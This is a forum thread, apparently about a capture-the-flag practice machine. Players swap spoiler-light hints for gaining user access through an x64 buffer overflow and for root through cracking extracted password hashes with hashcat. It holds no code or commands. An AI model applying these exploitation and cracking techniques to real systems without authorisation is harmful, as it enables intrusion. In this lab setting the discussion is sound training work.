Much has been said on the exploit. Write the string you want to execute to a memory address you know is writable and doesn’t change. Refer to the memory layout. And no, it’s not the stack.
root
Only one of the 6 hashes is correct. And I don’t blame the creator for choosing that password because that pretty much sums up the whole ordeal. :lol:
■■■■, you’re definitely not wrong referring to the password. I had a massive “wtf” moment with that.
Fun box but I think RE + custom exploitation right off the bat for user might make this worth a few more points than “easy”. Root difficulty felt more appropriate.
User:
Use the source to find the very first foothold, it will point you to an interesting file.
Look into exploiting x64 linux BOF for tutorials. All the the libs needed to chain a payload are right in front of you. You can trick the program into asking for more. Trying to deliver a payload by file redirection is painful; there is a helpful python lib for pwning.
Root:
The box is pretty stripped down for setting up shop with the usual post-exploit tools. A handy low port is helpful if you add the key. All the files are right in front of you from user. 6 files; 6 hashes. Someone has mentioned --help on a certain tool to get the hashes; RTFM.
@Ripc0rd said:
Can anyone throw me a hint on root? Hashcat went through the whole rockyou and turned up blank?
If you have only 1 hash then you’re missing some information on how this app works.
Read about various ways and see how you can produce more than 1 hash.
When you have this you’ll get the creds really quick
got 6 hashes, but still not getting anything back?
Ok, I actually took some time to explore and found out that hashcat expects a bit different format for the hash depending on type of encryption and whether certain feature was used.
See example hashes example_hashes [hashcat wiki] and you’ll
figure out what you need to change in the hash for hashcat to work as well.
I guess that creator of the tool didn’t care about hashcat
Finally got root!!
User was a little brainfuck for me since I was new to binary exploitation.
Root: learned about a certain app,
thanks to @Ripc0rd@keyos1@Kucharskov@rewks for nudges.
Had problems getting the exploit to work properly despite being verified by some users. Ended up having to do it manually and I’d love to know why my original code didn’t work if you’re up for debugging it with me. PM Me
Finally root!!! What a journey… About 12 hours for user and only about 15 minutes for root… Thx to all the nice people here who helped me immense in getting user. Special shoutout to @toka@jimmypw and @Kucharskov You guys really rock the show!
User:
ippsec has a great video from 2015 about another CTF challenge which helps you a lot!!!
Add the exploit to a file and execute it afterwards. Don’t do it on the fly via cli. This cost me maybe more than 2 hours.
Find a way to exploit via leet port
Leave an entry point
Root:
Everything already said. Everything you’ll need is right in front of you. Maybe the easiest root I’ve ever had!
Feel free to send me a PM, if you need some hints.
I really liked this box at least for the user. Learnt a lot of things about advanced BOF.
The frustrating part is that we could not used libc leak method remotely (through nc) but locally it works fine.
Of course since it’s an easy box you don’t have to go through libc leak but just use what is in front of you on m***p but If you want to extend your skillz I recommend u to try with the hard method anyway
Would love to chat with someone who as completed the bin ex. I have it working but i am struggling to understand why its working. If you have a good understanding of it and can spare a few minutes please let me know.
Hello ,
It is my first time I am attending any active machine . I couldn’t able to figure out what to do after n map . I tried login in to SSH using user & root but it is all password protected . Can anyone PM me the right direction how to proceed further .
I’m happy to help anyone if you have specific questions about the binex feel free to message me. In the interest of efficiency, though, it will probably be pretty beneficial for both of us if you’ve watched some of the videos or read some of the webpages linked in this post. If you message me saying “any hints for binex” or similar, that’s what I’m going to tell you.